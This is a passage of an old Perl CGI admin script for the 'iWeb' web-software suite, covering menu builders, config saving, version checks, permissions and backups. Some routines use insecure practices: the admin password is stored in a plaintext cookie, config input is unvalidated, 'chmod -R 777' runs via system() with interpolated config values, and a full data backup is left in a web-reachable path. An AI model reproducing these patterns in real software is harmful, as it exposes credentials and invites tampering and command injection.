    print "Content-Type: text/html\n\n";
    print $OUT;

    exit 0;

}

sub Admin_Jump_Menu {

   my ($menu,$options,$form);

   $form = "<OPTION>Select Program";
    if ($programs{'SQL'} eq "T") { $form .= "<OPTION>SQL Manager\n"; }
    if ($programs{'PASSWORD'} eq "T") { $form .= "<OPTION>.htaccess Manager\n"; }
    if ($programs{'BBS'} eq "T") { $form .= "<OPTION>iForums\n"; }
    if ($programs{'CLASS'} eq "T") { $form .= "<OPTION>Classifieds\n"; }
    if ($programs{'GBOOK'} eq "T") { $form .= "<OPTION>Guestbook\n"; }
    if ($programs{'FILES'} eq "T") { $form .= "<OPTION>File Exchange\n"; }
    if ($programs{'SPLAT'} eq "T") { $form .= "<OPTION>Splatterboard\n"; }
    if ($programs{'HYPERSEEK'} eq "T") { $form .= "<OPTION>Hyperseek\n"; }
    if ($programs{'WEBRING'} eq "T") { $form .= "<OPTION>Ringmaster\n"; }
    if ($programs{'ISHOP'} eq "T") { $form .= "<OPTION>iShop\n"; }
    if ($programs{'ISEEK'} eq "T") { $form .= "<OPTION>iSeek\n"; }
    if ($programs{'ILINK'} eq "T") { $form .= "<OPTION>iLink\n"; }
    if ($programs{'BANNERS'} eq "T") { $form .= "<OPTION>Bannermaster\n"; }
    if ($programs{'WHATSNEW'} eq "T") { $form .= "<OPTION>What's New\n"; }
    if ($programs{'JACKHAMMER'} eq "T") { $form .= "<OPTION>Jackhammer\n"; }
    if ($programs{'SUPPORT'} eq "T") { $form .= "<OPTION>e-Support\n"; }

   $options = qq^

      newCat();
      O("Select Option","");

   ^;

    if ($programs{'SQL'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("iSQL","$urls{'SQL'}?action=sql_editor");
      O("Create Table","$urls{'SQL'}?action=define_table");
      O("Import Data","$urls{'SQL'}?action=import");
      O("Template","$PROG_URL?action=edit_file&filename=sql");
      ^;
    }

    if ($programs{'PASSWORD'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Group: Create","password_admin.cgi?action=newgroup");
      O("Group: Delete","password_admin.cgi?action=delgroup");
      O("Users: Add","password_admin.cgi?action=newpass");
      O("Users: Add to Group","password_admin.cgi?action=addtogroup");
      O("Users: Change Password","password_admin.cgi?action=cngpass");
      O("Users: Delete","password_admin.cgi?action=rempass");
      O("Server: Protect Dir","password_admin.cgi?action=addaccess");
      O("Server: Unprotect","password_admin.cgi?action=delaccess");
      O("Server: Change Group for Dir","password_admin.cgi?action=changeaccess");
      ^;
    }

    if ($programs{'BBS'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Define Categories","$urls{'BBS'}?action=Define+Categories");
      O("Assign Categories","$urls{'BBS'}?action=Setup+Categories");
      O("Create Forum","$urls{'BBS'}?action=New");
      O("Edit Themes","$urls{'BBS'}?action=Templates");
      O("User Management","$urls{'BBS'}?action=UserMenu");
      O("Group Management","$urls{'BBS'}?action=GroupList");
      ^;
    }

    if ($programs{'CLASS'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      ^;
    }

    if ($programs{'GBOOK'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Comment Layout","$urls{'GBOOK'}?action=Define+Comment+Layout");
      O("Manage Guestbook","$urls{'GBOOK'}?action=Open+Guestbook");
      O("Delete Guestbook","$urls{'GBOOK'}?action=Delete+Guestbook");
      ^;
    }

    if ($programs{'FILES'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      ^;
    }

    if ($programs{'SPLAT'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Re-Create Database","$urls{'SPLAT'}?action=Create");
      ^;
    }

    if ($programs{'HYPERSEEK'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Add Link","$urls{'HYPERSEEK'}?action=Edit&show_cats=1&id=NEW");
      O("Branding","$urls{'HYPERSEEK'}?action=branding");
      O("Build HTML","$urls{'nph_HYPERSEEK'}?action=BuildForm");
      O("Category Moderators","$urls{'HYPERSEEK'}?action=Moderators");
      O("Change Requests","$urls{'HYPERSEEK'}?action=Change+Requests");
      O("Count Categories","$urls{'nph_HYPERSEEK'}?action=Count");
      O("Database Mgr","$urls{'HYPERSEEK'}?action=Utilities");
      O("Dead Links Report","$urls{'HYPERSEEK'}?action=view_verify_report");
      O("Define Categories","$urls{'HYPERSEEK'}?action=Category+Mgr");
      O("Directory","$urls{'HYPERSEEK'}");
      O("Duplicate Report","$urls{'nph_HYPERSEEK'}?action=Duplicates");
      O("Email Editor","$urls{'HYPERSEEK'}?action=Email+Editor");
      O("Expired Links","$urls{'HYPERSEEK'}?action=expired_links");
      O("Featured Sites","$urls{'HYPERSEEK'}?action=list_featured");
      O("Init Top 10","$urls{'HYPERSEEK'}?action=init_top10");
      O("Init Ratings","$urls{'HYPERSEEK'}?action=init_rate");
      O("Optin Email","$urls{'nph_HYPERSEEK'}?action=Optin");
      O("Qualifiers","$urls{'HYPERSEEK'}?action=Qualifiers");
      O("Reload Data","$urls{'nph_HYPERSEEK'}?action=ReLoad");
      O("Recalculate Scores","$urls{'nph_HYPERSEEK'}?action=ReCalculate");
      O("Reject Editor","$urls{'HYPERSEEK'}?action=Reject+Editor");
      O("Site Reviews","$urls{'HYPERSEEK'}?action=review_list");
      O("Spidered","$urls{'HYPERSEEK'}?action=Spidered");
      O("Stats","$urls{'hsx_url'}");
      O("Submissions","$urls{'HYPERSEEK'}?action=New+Additions");
      O("Templates","$urls{'HYPERSEEK'}?action=Templates");
      O("Unload Data","$urls{'nph_HYPERSEEK'}?action=ReBuild");
      O("User Accounts","$urls{'HYPERSEEK'}?action=ListAccounts&list=1");
      O("Validate Categories","$urls{'nph_HYPERSEEK'}?action=Validate");
      O("What's Cool","$urls{'HYPERSEEK'}?search=COOL");
      O("What's New","$urls{'HYPERSEEK'}?go=NEW");
      O("Webmaster Email","$urls{'nph_HYPERSEEK'}?action=Mail");
      ^;
    }

    if ($programs{'WEBRING'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      ^;
    }

    if ($programs{'ISEEK'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      ^;
    }

    if ($programs{'ILINK'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Build Static Pages","$urls{'nph_ilink'}");
      O("Add New Link","$urls{'ILINK'}?action=AddLink");
      O("Count Listings","$urls{'ILINK'}?action=Re-Count+Listings");
      O("Create Maillists","$urls{'ILINK'}?action=Create+Mailing+Lists");
      O("Define Categories","$urls{'ILINK'}?action=Category+Mgr");
      O("Link Manager","$urls{'ILINK'}?action=Link+Manager");
      O("Submissions","$urls{'ILINK'}?action=Pending+Links");
      ^;
    }

    if ($programs{'BANNERS'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Acceptance Email","$urls{'BANNERS'}?action=Edit+Acceptance+Email");
      O("Add Account","$urls{'BANNERS'}?action=Add+Account");
      O("Clean Click Logs","$urls{'BANNERS'}?action=Cleanup");
      O("Define Groups","$urls{'BANNERS'}?action=Define+Groups");
      O("List Accounts","$urls{'BANNERS'}?action=List+Accounts");
      O("Add Account","$urls{'BANNERS'}?action=Add+Account");
      O("List Campaigns","$urls{'BANNERS'}?action=List+Campaigns");
      O("Add Campaign","$urls{'BANNERS'}?action=Add+Campaign");
      O("Pending","$urls{'BANNERS'}?action=PendingList");
      O("Report Template","$PROG_URL?action=edit_file&filename=adreport");
      ^;
    }

    if ($programs{'WHATSNEW'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Add Item","$urls{'WHATSNEW'}?action=Add");
      O("Match HS Categories","$urls{'WHATSNEW'}?action=create_whats_new_categories");
      ^;
    }

    if ($programs{'JACKHAMMER'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Add Account","$urls{'JACKHAMMER'}?action=Add");
      O("List all Accounts","$urls{'JACKHAMMER'}?action=List");
      O("Review Deposits","$urls{'JACKHAMMER'}?action=Deposits");
      ^;
    }


   $menu = qq^

   <SCRIPT LANGUAGE="JavaScript">
      v=false;
   </SCRIPT>

   <SCRIPT LANGUAGE="JavaScript1.1">
      if (typeof(Option)+"" != "undefined") v=true;
   </SCRIPT>

   <SCRIPT LANGUAGE="JavaScript">
   if(v){a=new Array(22);}

   function getFormNum (formName) {
        var formNum =-1;
        for (i=0;i<document.forms.length;i++){
                tempForm = document.forms[i];
                if (formName == tempForm) {
                        formNum = i;
                        break;
                }
        }
        return formNum;
   }

   function jmp(form, elt)
   // The first parameter is a reference to the form.
   {
        if (form != null) {
                with (form.elements[elt]) {
                        if (0 <= selectedIndex && selectedIndex != 0)
                                parent.main.location.href = options[selectedIndex].value;
                }
        }
   }

   var catsIndex = -1;
   var itemsIndex;

   if (v) { // ns 2 fix
      function newCat(){
        catsIndex++;
        a[catsIndex] = new Array();
        itemsIndex = 0;
      }

      function O(txt,url) {
        a[catsIndex][itemsIndex]=new myOptions(txt,url);
        itemsIndex++;
      }

      function myOptions(text,value){
        this.text = text;
        this.value = value;
      }

      // fill array

      $options

   } // if (v)

   function relate(formName,elementNum,j) {
      if(v){
         var formNum = getFormNum(formName);
          if (formNum>=0) {
           formNum++; // reference next form, assume it follows in HTML
           with (document.forms[formNum].elements[elementNum]) {
                for(i=options.length-1;i>0;i--) options[i] = null; // null out in reverse order (bug workarnd)
                for(i=0;i<a[j].length;i++){
                        options[i] = new Option(a[j][i].text,a[j][i].value); 
                }
                options[0].selected = true;
           }
          }
         } else {
            jmp(formName,elementNum);
      }
   }

   function IEsetup(){
        if(!document.all) return;
        IE5 = navigator.appVersion.indexOf("5.")!=-1;
        if(!IE5) {
                for (i=0;i<document.forms.length;i++) {
                        document.forms[i].reset();
                }
        }
   }
   
   window.onload = IEsetup;

   </SCRIPT>
   <style>.saveHistory {behavior:url(#default#savehistory);}</style>
   <body bgcolor="black">
                <TABLE BGCOLOR="black" CELLSPACING=0 CELLPADDING=0>
                 <TR>
                  <TD>
                   <FONT FACE="verdana,arial,helvetica" SIZE=1" COLOR="yellow"><B>iWeb Admin Quick Jump:</B></FONT>
                  </TD>
                  <FORM NAME="f1">
                  <TD>
                        <SELECT NAME="m1" ID="m1" CLASS=saveHistory onChange="relate(this.form,0,this.selectedIndex)">
                          $form
                        </SELECT>
                  </TD>
                     </FORM>
                     <FORM NAME="f2">
                  <TD>
                      <SELECT NAME="m2" ID="m2" CLASS=saveHistory onChange="jmp(this.form,0)">
                      <OPTION>---------------------------
                      <OPTION>
                      <OPTION>
                      <OPTION>
                      <OPTION>
                      <OPTION>
                      <OPTION>
                      <OPTION>
                      </SELECT>
                   </TD>
                   </FORM>
                   <TD><A HREF="$PROG_URL?action=helpmenu"><FONT COLOR="yellow" SIZE=1 FACE="verdana,arial,helvetica">Help Menu</FONT></A></TD>
                  </TR>
                </TABLE>
   ^;

   print "Content-Type: text/html\n\n";
   print $menu;
   exit 0;
}


sub Admin_Help_Menu {

   my ($menu,$options,$form);

   $form = "<OPTION>Select Program";
    if ($programs{'SQL'} eq "T") { $form .= "<OPTION>SQL Manager\n"; }
    if ($programs{'PASSWORD'} eq "T") { $form .= "<OPTION>.htaccess Manager\n"; }
    if ($programs{'BBS'} eq "T") { $form .= "<OPTION>iForums\n"; }
    if ($programs{'CLASS'} eq "T") { $form .= "<OPTION>Classifieds\n"; }
    if ($programs{'GBOOK'} eq "T") { $form .= "<OPTION>Guestbook\n"; }
    if ($programs{'COMMENTS'} eq "T") { $form .= "<OPTION>Hyperseek Comments\n"; }
    if ($programs{'FILES'} eq "T") { $form .= "<OPTION>File Exchange\n"; }
    if ($programs{'SPLAT'} eq "T") { $form .= "<OPTION>Splatterboard\n"; }
    if ($programs{'MAIL'} eq "T") { $form .= "<OPTION>Mailman\n"; }
    if ($programs{'HYPERSEEK'} eq "T") { $form .= "<OPTION>Hyperseek\n"; }
    if ($programs{'WEBRING'} eq "T") { $form .= "<OPTION>Ringmaster\n"; }
    if ($programs{'ISHOP'} eq "T") { $form .= "<OPTION>iShop\n"; }
    if ($programs{'ISEEK'} eq "T") { $form .= "<OPTION>iSeek\n"; }
    if ($programs{'ILINK'} eq "T") { $form .= "<OPTION>iLink\n"; }
    if ($programs{'BANNERS'} eq "T") { $form .= "<OPTION>Bannermaster\n"; }
    if ($programs{'WHATSNEW'} eq "T") { $form .= "<OPTION>What's New\n"; }
    if ($programs{'JACKHAMMER'} eq "T") { $form .= "<OPTION>Jackhammer\n"; }
    if ($programs{'SUPPORT'} eq "T") { $form .= "<OPTION>e-Support\n"; }

   $options = qq^

      newCat();
      O("Select Option","");

   ^;

    if ($programs{'SQL'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      ^;
    }

    if ($programs{'PASSWORD'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      ^;
    }

    if ($programs{'BBS'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("iForums Help Index","$global{'html_dir'}/iforums/");
      O("Admin a Forum","$global{'html_dir'}/iforums/open_forum.html");
      O("Assign Categories","$global{'html_dir'}/iforums/assign_cats.html");
      O("Create /Config Forum","$global{'html_dir'}/iforums/create_forum.html");
      O("Define Categories","$global{'html_dir'}/iforums/define_cats.html");
      O("Edit Themes","$global{'html_dir'}/iforums/themes.html");
      O("User Management","$global{'html_dir'}/iforums/users.html");
      O("Group Management","$global{'html_dir'}/iforums/groups.html");
      ^;
    }

    if ($programs{'CLASS'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      ^;
    }

    if ($programs{'GBOOK'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Help Index","$global{'html_dir'}/ibook/index.html");
      O("Comment Layout","$global{'html_dir'}/ibook/layout.html");
      O("DB Management","$global{'html_dir'}/ibook/editdb.html");
      ^;
    }

    if ($programs{'COMMENTS'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Help Index","$global{'html_dir'}/comments/index.html");
      O("Comment Layout","$global{'html_dir'}/comments/layout.html");
      O("DB Management","$global{'html_dir'}/comments/editdb.html");
      ^;
    }

    if ($programs{'FILES'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      ^;
    }

    if ($programs{'SPLAT'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Help Index","$global{'html_dir'}/splat/index.html");
      ^;
    }

    if ($programs{'MAIL'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Help Index","$global{'html_dir'}/mailman/index.html");
      O("Add Name","$global{'html_dir'}/mailman/addentry.html");
      O("List Manager","$global{'html_dir'}/mailman/manage.html");
      O("Send Bulk Email","$global{'html_dir'}/mailman/sendmail.html");
      O("User Utilities","$global{'html_dir'}/mailman/users.html");
      ^;
    }

    if ($programs{'HYPERSEEK'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Help Index","$global{'html_dir'}/hyperseek/");
      O("Add Link","$global{'html_dir'}/hyperseek/addlink.html");
      O("Branding","$global{'html_dir'}/hyperseek/branding.html");
      O("Build HTML","$global{'html_dir'}/hyperseek/buildhtml.html");
      O("Category Moderators","$global{'html_dir'}/hyperseek/moderators.html");
      O("Category Templates","$global{'html_dir'}/hyperseek/cattemplate.html");
      O("Change Requests","$global{'html_dir'}/hyperseek/submissions.html");
      O("Command Line / Cron ","$global{'html_dir'}/hyperseek/nph.html");
      O("Count Categories","$global{'html_dir'}/hyperseek/updatecats.html");
      O("Database Mgr","$global{'html_dir'}/hyperseek/dbmanager.html");
      O("Dead Links Report","$global{'html_dir'}/hyperseek/deadlinks.html");
      O("Define Categories","$global{'html_dir'}/hyperseek/catmanager.html");
      O("Directory","$global{'html_dir'}/hyperseek/directory.html");
      O("Duplicate Report","$global{'html_dir'}/hyperseek/duplicates.html");
      O("Email Editor","$global{'html_dir'}/hyperseek/acceptance.html");
      O("Expired Links","$global{'html_dir'}/hyperseek/expire.html");
      O("Featured Sites","$global{'html_dir'}/hyperseek/featured.html");
      O("Import/Export","$global{'html_dir'}/hyperseek/import.html");
      O("Listing Templates","$global{'html_dir'}/hyperseek/listingtemplate.html");
      O("Optin Email","$global{'html_dir'}/hyperseek/optin.html");
      O("Qualifiers","$global{'html_dir'}/hyperseek/qualifiers.html");
      O("Recalculate Scores","$global{'html_dir'}/hyperseek/recalculate.html");
      O("Reject Editor","$global{'html_dir'}/hyperseek/reject.html");
      O("Site Reviews","$global{'html_dir'}/hyperseek/reviews.html");
      O("Site Reviews: writing","$global{'html_dir'}/hyperseek/writing_reviews.html");
      O("Spidered","$global{'html_dir'}/hyperseek/submissions.html");
      O("Spidering URLs","$global{'html_dir'}/hyperseek/spidermore.html");
      O("Stats","$global{'html_dir'}/hyperseek/stats.html");
      O("Submissions","$global{'html_dir'}/hyperseek/submissions.html");
      O("Templates","$global{'html_dir'}/hyperseek/templates.html");
      O("User Accounts","$global{'html_dir'}/hyperseek/accounts.html");
      O("Validate Categories","$global{'html_dir'}/hyperseek/validate.html");
      O("What's Cool","$global{'html_dir'}/hyperseek/cool.html");
      O("What's New","$global{'html_dir'}/hyperseek/new.html");
      O("Webmaster Email","$global{'html_dir'}/hyperseek/email.html");
      ^;
    }

    if ($programs{'WEBRING'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      ^;
    }

    if ($programs{'ISHOP'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      ^;
    }

    if ($programs{'ISEEK'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      ^;
    }

    if ($programs{'ILINK'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Help Index","$global{'html_dir'}/ilink/index.html");
      O("Add Category","$global{'html_dir'}/ilink/addcat.html");
      O("Category Mgr","$global{'html_dir'}/ilink/catmanager.html");
      O("Build Static Pages","$global{'html_dir'}/ilink/build.html");
      O("Link Browser","$global{'html_dir'}/ilink/browser.html");
      O("Edit Listing","$global{'html_dir'}/ilink/editlink.html");
      O("Pending Submissions","$global{'html_dir'}/ilink/pending.html");
      ^;
    }

    if ($programs{'BANNERS'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Help Index","$global{'html_dir'}/bannermaster/");
      O("Acceptance Email","$global{'html_dir'}/bannermaster/email.html");
      O("Add Account","$global{'html_dir'}/bannermaster/account_form.html");
      O("Define Groups","$global{'html_dir'}/bannermaster/define_groups.html");
      O("Define Groups","$global{'html_dir'}/bannermaster/assign_groups.html");
      O("List Advertiser","$global{'html_dir'}/bannermaster/account_list.html");
      O("Add Advertiser","$global{'html_dir'}/bannermaster/account_Form.html");
      O("List Campaigns","$global{'html_dir'}/bannermaster/campaign_list.html");
      O("Add Campaigns","$global{'html_dir'}/bannermaster/campaign_Form.html");
      O("Pending","$global{'html_dir'}/bannermaster/pending.html");
      O("Report Template","$global{'html_dir'}/template_editor.html");
      ^;
    }

    if ($programs{'WHATSNEW'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Help Index","$global{'html_dir'}/whatsnew/index.html");
      O("DB Management","$global{'html_dir'}/whatsnew/editdb.html");
      O("Add Item","$global{'html_dir'}/whatsnew/additem.html");
      ^;
    }

    if ($programs{'JACKHAMMER'} eq "T") { 
      $options .= qq^
      newCat();
      O("Select Option","");
      O("Help Index","$global{'html_dir'}/jackhammer/");
      O("Add Account","$global{'html_dir'}/jackhammer/addaccount.html");
      O("List all Accounts","$global{'html_dir'}/jackhammer/addaccount.html");
      O("USER: Control Panel","$global{'html_dir'}/jackhammer/controlpanel.html");
      O("USER: Bidding","$global{'html_dir'}/jackhammer/bids.html");
      ^;
    }


   $menu = qq^

   <SCRIPT LANGUAGE="JavaScript">
      v=false;
   </SCRIPT>

   <SCRIPT LANGUAGE="JavaScript1.1">
      if (typeof(Option)+"" != "undefined") v=true;
   </SCRIPT>

   <SCRIPT LANGUAGE="JavaScript">
   if(v){a=new Array(22);}

   function getFormNum (formName) {
        var formNum =-1;
        for (i=0;i<document.forms.length;i++){
                tempForm = document.forms[i];
                if (formName == tempForm) {
                        formNum = i;
                        break;
                }
        }
        return formNum;
   }

   function jmp(form, elt)
   // The first parameter is a reference to the form.
   {
        if (form != null) {
                with (form.elements[elt]) {
                        if (0 <= selectedIndex && selectedIndex != 0)
                                parent.main.location.href = options[selectedIndex].value;
                }
        }
   }

   var catsIndex = -1;
   var itemsIndex;

   if (v) { // ns 2 fix
      function newCat(){
        catsIndex++;
        a[catsIndex] = new Array();
        itemsIndex = 0;
      }

      function O(txt,url) {
        a[catsIndex][itemsIndex]=new myOptions(txt,url);
        itemsIndex++;
      }

      function myOptions(text,value){
        this.text = text;
        this.value = value;
      }

      // fill array

      $options

   } // if (v)

   function relate(formName,elementNum,j) {
      if(v){
         var formNum = getFormNum(formName);
          if (formNum>=0) {
           formNum++; // reference next form, assume it follows in HTML
           with (document.forms[formNum].elements[elementNum]) {
                for(i=options.length-1;i>0;i--) options[i] = null; // null out in reverse order (bug workarnd)
                for(i=0;i<a[j].length;i++){
                        options[i] = new Option(a[j][i].text,a[j][i].value); 
                }
                options[0].selected = true;
           }
          }
         } else {
            jmp(formName,elementNum);
      }
   }

   function IEsetup(){
        if(!document.all) return;
        IE5 = navigator.appVersion.indexOf("5.")!=-1;
        if(!IE5) {
                for (i=0;i<document.forms.length;i++) {
                        document.forms[i].reset();
                }
        }
   }
   
   window.onload = IEsetup;

   </SCRIPT>
   <style>.saveHistory {behavior:url(#default#savehistory);}</style>
   <body bgcolor="black">
                <TABLE BGCOLOR="black" CELLSPACING=0 CELLPADDING=0>
                 <TR>
                  <TD>
                   <FONT FACE="verdana,arial,helvetica" SIZE=1" COLOR="yellow"><B>iWeb Quick Help:</B></FONT>
                  </TD>
                  <FORM NAME="f1">
                  <TD>
                        <SELECT NAME="m1" ID="m1" CLASS=saveHistory onChange="relate(this.form,0,this.selectedIndex)">
                          $form
                        </SELECT>
                  </TD>
                     </FORM>
                     <FORM NAME="f2" ACTION="http://www.iwebsupport.com/cgi-bin/iseek.cgi" METHOD="post" TARGET="main">
                  <TD>
                      <SELECT NAME="m2" ID="m2" CLASS=saveHistory onChange="jmp(this.form,0)">
                      <OPTION>---------------------------
                      <OPTION>
                      <OPTION>
                      <OPTION>
                      <OPTION>
                      <OPTION>
                      <OPTION>
                      <OPTION>
                      </SELECT>
                   </TD>
                   <TD>
                      <FONT COLOR="yellow" SIZE=1 FACE="verdana,arial,helvetica">Help Search: <INPUT NAME="Terms"> &nbsp; &nbsp; &nbsp; &nbsp;
                   </TD>
                   </FORM>
                   <TD><A HREF="$PROG_URL?action=menuframe"><FONT COLOR="yellow" SIZE=1 FACE="verdana,arial,helvetica">Main Menu</FONT></A></TD>
                  </TR>
                </TABLE>
   ^;

   print "Content-Type: text/html\n\n";
   print $menu;
   exit 0;

}

##############################################################################
#      _____                        ______ ____
#     / ___/ ____ _ _   __ ___     / ____// __/____ _
#     \__ \ / __ `/| | / // _ \   / /    / /_ / __ `/
#    ___/ // /_/ / | |/ //  __/  / /___ / __// /_/ /
#   /____/ \__,_/  |___/ \___/   \____//_/   \__, /
#                                           /____/
##############################################################################

sub go_setops {

   my($fieldname,$val,$Title,$Message,$click,$acookie,$value,$field_name,$john);

   foreach $field_name (@Fields) {
       $field_name =~ s/\n//g;
       if($field_name =~ "_required" || $field_name =~ "_include") { 
          foreach $key( keys %global ) {
            if($key =~ "_required") { delete $global{$key}; }
            if($key =~ "_include") { delete $global{$key}; }
          }
          last;
       }
   }

   foreach $field_name (@Fields) {
       $field_name =~ s/\n//g;
       $val = $input{$field_name};
       $val =~ s/\n//g;
       if($field_name =~ "_required" && $val eq "on") { $val = "CHECKED"; }
       if($field_name =~ "_include" && $val eq "on") { $val = "CHECKED"; }

       $global{$field_name}=$val;

   }

   open (FILE, "> $data_dir/global.config");
       foreach $value(sort keys %global) {
           print FILE "$value=$global{$value}\n" if($value);
       }
   close(FILE);


   $Title = "Success ($data_dir)";
   $Message = "Options Saved...<BR><BR><i>If</i> you changed your <b>virtual cgi directory</b>, then you'll need to reload the admin program for the new settings to take effect.<BR>'}";
   $click = "history.go(-2)";

   $acookie = "password\~$global{'admin_pw'}";
   print "Set-Cookie:admin=$acookie;path=/\n";
   &ok_box($Title,$Message,$click);
   exit 0;


}





sub Version_Info {

   my (@dirs,$directory,$file,%files,$program,$filename,$prog_ver,%versions,$j,$SEND,$versionfound,$validok);

   @dirs=("IWEBROOT","admin","cb","moderators","utilities","IWeb","accounts");

   if($ISP) { &ERROR("Access denied to the common CGI Directory"); exit 0; }

   foreach $directory(@dirs) {
     $directory =~ s/IWEBROOT//g;
     opendir(FILES, "../$directory");
      while($file = readdir(FILES)) {
          if($file =~ /.*\.cgi/ || $file =~ /.*\.pm/) {
             $files{"$directory/$file"}++;
          }
      }
      closedir(FILES);
    }


    foreach $file(sort keys %files) { 
       open("F","../$file");
          while (<F>) {
            if ($_ =~ "VERSION" && !($versionfound)) {
               s/\$//g;
               s/\"//g;
               s/\;//g;
               s/\=//g;
               s/\#//g;
               s/\://g;
               s/\ //g;
               s/VERSION//g;
               $prog_ver = $_; 
               $versionfound=1;
               last;
            }
          }
       close(F);
       if($versionfound) { 
          $prog_ver =~ s/\n//g;
          $prog_ver =~ s/\cM//g;
          $versions{"$file"}=$prog_ver;
       }
       $versionfound=0; 
       $prog_ver = "";
    }

    if($_[0] eq "short") { 
        foreach $file(sort keys %versions) { $SEND .= "$file $versions{$file}<BR>\n"; }
        print "Content-Type: text/html\n\n";
        print $SEND;
    }


    else {

        foreach $file(sort keys %versions) { $SEND .= "$file $versions{$file}|"; }

          print "Content-Type: text/html\n\n";
          print qq!

      <BODY BGCOLOR="#e0e0e0" LINK="maroon" VLINK="maroon" TEXT="black">
        <CENTER>
      
          <TABLE BGCOLOR="white" BORDER="1" CELLPADDING="3" WIDTH=600><TR><TD>
          <TABLE BORDER="0" CELLSPACING=0 CELLPADDING="3" WIDTH="100%">
              <TR BGCOLOR="#cccc99">
                 <TD><FONT FACE="Verdana,Arial, Helvetica" SIZE="2" COLOR="#660000" WIDTH=100%><B>iWeb Installer</B></FONT></TD>
              </TR>
              <TR>
                 <TD BGCOLOR="#EEEEEE" VALIGN="top">
                  <FONT FACE="Verdana,Arial, Helvetica" SIZE="2" COLOR="#000000">

                  <FORM ACTION="http://www.iwebsupport.com/cgi-bin/upgrade/versions.cgi" METHOD="POST">
                  <B>Please Enter a valid iWeb Registration ID:</B><BR><BR>
                  <CENTER>
                  <INPUT NAME="order_id">
                  <INPUT TYPE="submit" VALUE="Upgrade">
                  <BR>(Enter "freeware" if you are using one of our Freeware Programs)
                  <INPUT TYPE="hidden" NAME="files" VALUE="$SEND">
                  </CENTER>

                  </FORM>

                 </FONT>
                </TD>
              </TR>
           </TABLE>
          </TD></TR></TABLE>
        </CENTER>
      </BODY>

      !; 

   }

   exit 0;
}



sub Set_Permissions {

   print "Content-Type: text/html\n\n";

   print "Setting System Permissions...<BR><BR>\n";

   print "CGI and PM Files ... (755)<BR>\n";
   system("chmod 755 *.cgi *.pm");

   print "Lock Directory... (777)<BR>\n";
   system("chmod -R 777 $data_dir/locks");

   print "Data Directory...(777)<BR>\n";
   system("chmod -R 777 $data_dir");

   print "Build Directory...(777)<BR>\n";
   system("chmod -R 777 $global{'DIR'}");

   print "<BR><BR>Done.<BR>\n";

   exit 0;

}

sub Backup_Data {

    my ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size,$atime,$mtime,$ctime,$blksize,$block);
    my $command1 = "tar cf $data_dir/iweb_data.tar $data_dir/*";

    system($command1);

    ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size,$atime,$mtime,$ctime,$blksize,$block) = stat "$data_dir/iweb_data.tar";

    my $DAT_SIZE = $size;

    print "Content-Type: text/html\n\n";

    if (-e "$data_dir/iweb_data.tar") {
       print "<CENTER><H1>Backup complete.</H1></CENTER><BLOCKQUOTE><BLOCKQUOTE>\n";
       print "<H4>We recommend that you download the <BLOCKQUOTE><A HREF=\"$data_dir/iweb_data.tar\">Data Backup File ($DAT_SIZE Bytes)</A></BLOCKQUOTE>to your local computer for safe keeping...</H4>\n";
       print "</CENTER><BLOCKQUOTE>Note: The backup file ($data_dir/iweb_data.tar) is in the same directory as your CGI Programs Data.  It is possible that you may not be able to download it using the link above (.cgi-bin directories will not allow downloads from them).  If you cannot download it with the provided link, we recommend that you FTP into your server and retreive the file manually.</BLOCKQUOTE></BLOCKQUOTE>\n";
    }
    else {
       print "<CENTER><H1>Data could not be backed up.</H1>\n";
       print "<H4>Exited with the following message: $!</H4>\n";
    }

    exit 0;

}


sub Plugins {

   my($file,%plugins,$plugin);

   opendir(PLUG,"../custom/");
    while($file = readdir(PLUG)) {
        if($file =~ /.*\.pm/) {
           $file =~ s/\.pm//g;
           $plugins{$file}++;
        }
    }
   closedir(PLUG);

   print "Content-Type: text/html\n\n";
   print qq|
<style type="text/css">A:hover {text-decoration: on; background-color: #DBDBDB; color: #000000;}</style>
<BODY BGCOLOR="#e0e0e0" LINK="maroon" VLINK="maroon" TEXT="black">
  <CENTER>
    <TABLE BGCOLOR="white" BORDER="1" CELLPADDING="3" WIDTH=500><TR><TD>
    <TABLE BORDER="0" CELLPADDING="3" WIDTH="100%">
        <TR BGCOLOR="#cccc99">
                <TD>
                   <FONT FACE="Verdana,Arial, Helvetica" SIZE="2" COLOR="#660000">
                   <b>Select Plugin to Edit</b>
                </TD>
        </TR>
        <TR>
                <TD BGCOLOR="#EEEEEE" VALIGN="top">
                  <FONT FACE="Verdana,Arial, Helvetica" SIZE="2" COLOR="#000000">
